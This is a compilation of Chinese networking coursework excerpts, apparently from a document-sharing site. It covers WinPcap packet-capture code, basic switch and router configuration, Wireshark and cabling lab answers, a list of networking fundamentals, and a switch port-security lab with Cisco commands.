详细过程: 程序在执行过程中有两个核心的工作,一是调用Winpcap函数库实现下层抓包。二是对抓到的包文进行分析。下面分别列出两个核心过程的基本算法与相关的实现代码。 抓包算法: 第一:初始化Winpcap开发库 第二:获得当前的网卡列表,同时要求用户指定要操作的网卡 第三:获得当前的过滤规则,可为空 第四:调用库函数,pcap_loop(),同时并指定其回调函数,其中其回调函数为数据包分析过程。 对应的相应核心代码为: I f((pCap=pcap_open_live(getDevice()->name,65536,1,1000,strErrorBuf))==NULL) { return -1; } If(pcap_compile(pCap, &fcode, filter, 1, NetMask) < 0) { return -1; } if(pcap_setfilter(pCap, &fcode)<0) { return -1; } do{ pcap_loop(pCap,1,pcap_handle,NULL); }while(nFlag); 分析算法: 第一:得到数据包,先将其转存到内存里,以备以后再用。 第二:分析当前的数据包,分析过程如下: 1.数据包的前14个字节(Byte)代表数据链路层的报文头,其报文格式是前6Byte 为目的MAC地址,随后的6个Byte为源Mac地址,最后的2Byte代表上层 协议类型这个数据很重要,是我们分析上层协议的依据。 2.根据1所分析到的协议类型进行类似1的迭代分析。这样就可以得到各层中 的报文头信息和数据信息。 第三:结束本次分析。 分析算法部分实现代码: m_pktHeaders.Add(pHeader); m_pktDatas.Add(pData); CFramePacket *pFramePacket = new CFramePacket(pData,14); if(pFramePacket->GetType() == 0x0800) { CIPPacket ipPacket(pData+14,pHeader->len-14); if(ipPacket.GetProtocol() == "UDP") { CUDPPacket*pUDPPacket = new CUDPPacket(ipPacket.GetTData(),ipPacket.GetDataLength()); } else if(ipPacket.GetProtocol() == "TCP") { CTCPPacket *pTCPPacket = new

《网络互联技术》实验报告

《网络互联技术》实验报告书 专业: 学号:

姓名: 实验1 交换机/路由器的基本配置和管理 一、【实验目的】 1、通过电缆实现交换机/路由器与PC机的连接; 2、通过交换机/路由器的开机启动报告了解交换机的硬件参数; 3、掌握交换机/路由器的常用命令. 二、【实验环境】 1 实验设备: 硬件:交换机、路由器个一台,PC机一台,console电缆及接口转换器。 软件:超级终端程序。 2 设备连接图:用console连接到交换机、路由器上 三、【实验内容】 1 通过Telnet访问交换机、路由器; 2 复制、备份配置文件。 四、【实验步骤】 步骤1访问交换机、路由器 1.用Cosole电缆将PC机的串口与交换机的Console端口相连; 2.在超级终端程序中按Enter键,记录超级终端程序窗口会出现的信息 3.进入特权模式,让交换机重启,记录交换机加电启动报告。 步骤2 交换机、路由器的基本配置 1.进入交换机的全局配置模式 2.配置交换机的设备名,设备名为Switch; 3.配置加密的特权密码为cisco1,验证特权密码:退出到用户模式,再进入特权模式。 4.查看交换机的版本,记录结果; 5.交换机的mac地址表

A、查看交换机的mac地址表,并记录结果; B、查看PC机的mac地址 步骤3配置交换机、路由器的端口属性 1.配置f0/1端口的速度为100M,命令: 2.配置f0/1端口为全双工,命令: 3.配置f0/1端口的描述为TO_PC1,命令: 4.启用f0/1端口;命令: 5.查看端口f0/1的信息,并记录结果。命令为 6.查看端口f0/1的状态,命令为: 7.查看所有端口的状态,并记录结果。命令为: 8.查看所有端口的IP摘要信息。命令为: 步骤4配置交换机、路由器管理接口的IP地址 1.进入配置Vlan1 接口子模式,命令: 2.配置Vlan1 接口的IP地址为192.168.1.1 4.启用Vlan1接口; 5.查看Vlan1接口的信息,并记录结果。命令为: 6.配置PC机的IP地址为192.168.1.10; 7.在PC机上ping 192.168.1.1;是否ping 通? 五、【实验结果与分析】 附注:【交换机的操作EXEC模式有】 1.用户模式[主机名>]:可以执行EXEC命令的一部分 2.特权模式[主机名#]:可以执行全部的EXEC命令 3.配置模式: 全局配置模式[主机名(config)#]:配置交换机的整体参数 接口配置模式[主机名(config-if)#]:配置交换机的接口参数 VLAN配置模式[主机名(config-VLAN)#]:配置交换机的VLAN参数4.交换机操作EXEC模式特点: 1) 支持命令简写(输入的字符串足够使系统识别,按TAB键将命令补充完整) 2) 在每种操作模式下直接输入“?”显示该模式下所有的命令 3) 命令空格“?”显示命令参数并对其解释说明 4) 常用的交换机配置命令有: Switch#show version//显示交换机硬件及软件的信息 Switch#show running-config//显示当前运行的配置参数 Switch#show configure//显示保存的配置参数 Switch#write memory//将当前运行的配置参数复制到flash Switch#delete flash:config.text//清空flash中的配置参数 Switch#reload交换机重启System configuration has been modified. Save? [yes/no]:n Switch(config)#hostname S2126G//配置交换机的主机名 Switch#configure terminal/进入全局配置模式下/ Switch(config)#interface fastEthernet 0/1 //进入接口配置模式 S2126G(config-if)#speed [10|100|auto]// 配置接口速率

2017计算机网络与通信技术实验报告要求

一、实验信息 2017计算机网络与通信技术实验报告要求 学号:15291202 姓名:杨有为班级:电气1511 IP:192.168.0.27 子网掩码:255.255.255.0 二、报告内容 1. 实验一,任务一 1) 画出实验室的网络拓扑图,将每个网络用CIDR记法进行表示,并注明你用的电脑处在哪一个网络。 2) 在你的电脑上打开cmd窗口,ping一下192.168.0.0网络的任何一台在线的主机,将实际运行结果进行图片保存,粘贴到实验报告上。 3) 在ping的过程中,利用wireshark捕捉包含对应ICMP报文的MAC帧,将此MAC帧的各个控制字段,以及此MAC帧中包含的IP数据报的各个控制字段,进行标注或者用文字列出。

IP报文 数据报的数据部分为48个字节 协议字段值为01代表IP数据报携带的是ICMP协议 下面对数据部分进行分析:IP数据报的数据部分=ICMP的首部+ICMP的数据部分 2. 实验一,任务二 1) 请写出T568B标准的线序,请将你做好的网线的图片粘贴到报告上。

T568B标准线序:白橙、橙色、白绿、蓝色、白蓝、绿色、白褐、褐色 2) 如果用校线器测出你做的网线只有1、2、3、6能通,那么在实验室网络环境下这根网线能否使用,为什么?10M、1000M、10G的以太网,哪个必须用到全部8根双绞线,请查阅资料后回答。 答:能用,因为在这8根双绞线中1、2用于发送,3、6用于接收,4、5、7、8是双向线,在100M以下的以太网中只需要其中四根,也就是1、2、3、6两对双绞线 就可以进行数据的传送。而1000M的以太网,必须用到全部的8根双绞线 3) 实验中你的网线做成功了吗?请总结成功或者失败的经验。 答:成功了,要细心。 3. 实验二,任务一 1) 请把你做的网站的静态和动态网页显示效果,冻结图片之后粘贴到报告上?

计算机网络技术基础个知识点

《计算机网络技术基础》200个知识点 1. 用一台计算机作为主机,通过通信线路与多台终端相连,构成简单的计算机连机系统。 2. 系统中所有数据处理都由主机完成,终端没有任何处理能力,仅起着字符输入、结果显示等作用。 3. 在大型主机-终端系统中,主机与每一台远程终端都用一条专用通信线路连接,线路的利用率较低。 4. ISO是国际标准化组织。 5. OSI/RM的全称是开放系统互连基本参考模型。 6. OSI/RM共有七层,因此也称为OSI七层模型。 7. 计算机网络是利用通信设备和线路把地理上分散的多台自主计算机系统连接起来,在相应软件(网络操作系统、网络协议、网络通信、管理和应用软件等)的支持下,以实现数据通信和资源共享为目标的系统。 8. 现代计算机网络能够实现资源共享。 9. 现代计算机网络中被连接的自主计算机自成一个完整的系统,能单独进行信息加工处理。 10. 计算机网络自主性是指连网的计算机之间不存在制约控制关系。 11. 计算机网络中计算机之间的互连通过通信设备及通信线路来实现。 12. 计算机网络要有功能完善的网络软件支持。 13. 计算机网络中各计算机之间的信息交换必须遵循统一的通信协议。 14. 一个计算机网络是由资源子网和通信子网构成。 15. 计算机网络的资源子网负责信息处理。 16. 通信子网由用作信息交换的通信控制处理机、通信线路和其他通信设备组成的独立的数据信息系统组成,它承担全网的数据传递、转接等通信处理工作。 17. 网络操作系统建立在各主机操作系统之上的一个操作系统,用于实现在不同主机系统之间的用户通信以及全网硬件和软件资源的共享,并向用户提供统一的、方便的网络接口,以方便用户使用网络。 18. 网络数据库系统可以集中地驻留在一台主机上,也可以分布在多台主机上。向网络用户提供存、取、修改网络数据库中数据的服务,以实现网络数据库的共享。 19. 计算机网络具有信息交换、资源共享、均衡使用网络资源、分布处理、数据信息的综合处理、提高计算机的安全可靠性的功能 20. 信息交换是计算机网络最基本的功能,主要完成计算机网络中各节点之间的系统通信。用户可以在网上收发电子邮件,发布新闻消息,进行电子购物、电子贸易、远程教育等。 21. 资源共享是指网络用户可以在权限范围内共享网中各计算机所提供的共享资源,包括软件、硬件和数据等。这种共享不受实际地理位置的限制。资源共享使得网络中分散的资源能够互通有无,大大提高了资源的利用率。它是组建计算机网络的重要目的之一。22. 在计算机网络中,如果某台计算机的处理任务过重,可通过网络将部分工作转交给较“空闲”的计算机来完成,均衡使用网络资源。 23. 对于较大型综合性问题的处理,可按一定的算法将任务分配给网络,由不同计算机进行分布处理,提高处理速度,有效利用设备。采用分布处理技术往往能够将多台性能不一定很高的计算机连成具有高性能的计算机网络,使解决大型复杂问题的费用大大降低。

交换机端口安全

《网络互联技术》课程实验报告 实验名称交换机端口安全实验序号 2 姓名高胜系院专业网络工程班级08网络1 班 学号0810322123 实验日期指导教师李红成绩 一、实验目的 ? 了解交换机的端口安全性的基本知识 ? 掌握如何配置交换机连接的最大安全地址数 ? 掌握如何配置交换机绑定指定的mac地址 二、实验内容与要求 1.在交换机上配置端口安全,以及违例的处理方式。 2.两台交换机以交叉线相连,其中主交换机上连接一台PC机,以用来验证链路。次交换机下连接两台PC机。在主交换机上配置最大安全地址数maximum,验证工作组PC数目超过最大安全地址数时,链路不通,以指定的违例处理方式处理。 3.在主交换机上配置绑定固定的mac地址,验证当更换工作组pc机时,链路不通,以指定的违例处理方式处理。 三、实验设备 模拟软件:Cisco PacketTracer53_setup_no_tutorials 设备:交换机两台,PC机若干,直连线,交叉线若干。 四、实验拓扑图

五、实验步骤 步骤1.画出实验拓扑结构图。 步骤2. 按实验拓扑图1连接设备。并对三台PC机进行IP设置。 步骤3.交换机更改主机名。 主交换机改名为SwitchA,次交换机改名为SwitchB。 步骤4.验证PC0,PC1与pc2三者之间都能ping通,说明交换机连接的网络是ok的。 步骤5.在SwitchA中对F0/1接口开启交换机端口安全,限制可接入的最大MAC数为1,违例处理为protect。注意,开启端口安全模式的接口必须为access SwitchA(config)#interface fastEthernet 0/1 SwitchA(config-if)#switchport mode access SwitchA(config-if)#switchport port-security !开启交换机端口安全功能 SwitchA(config-if)#switchport port-security maximum 1 !设置最大安全地址数SwitchA(config-if)#switchport port-security violation protect !设置违例处置方式为protect 步骤6.查看安全模式是否配置成功 步骤7. 配置完成后,再从PC0 ping pc2 ,是不通的,因为switchA的fa0/1接口上,实际上接了2台pc机,超过了端口可接的最大地址数。 PC0>ping 192.168.10.3 Pinging 192.168.10.3 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 192.168.10.3: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), 【注意】:此时虽然PC0与pc2无法ping通,但是由于违例处理为protect,SwitchA与SwitchB 之间的线路还是连通的,可以观察到线缆两端是绿色的点。 步骤8. 将Switch A 与SwitchB之间的连线切换到SwitchA 的F0/2接口。 步骤9 .再F0/2接口上配置端口安全模式,最大MAC数为1,违例处理为shutdown。

相关文档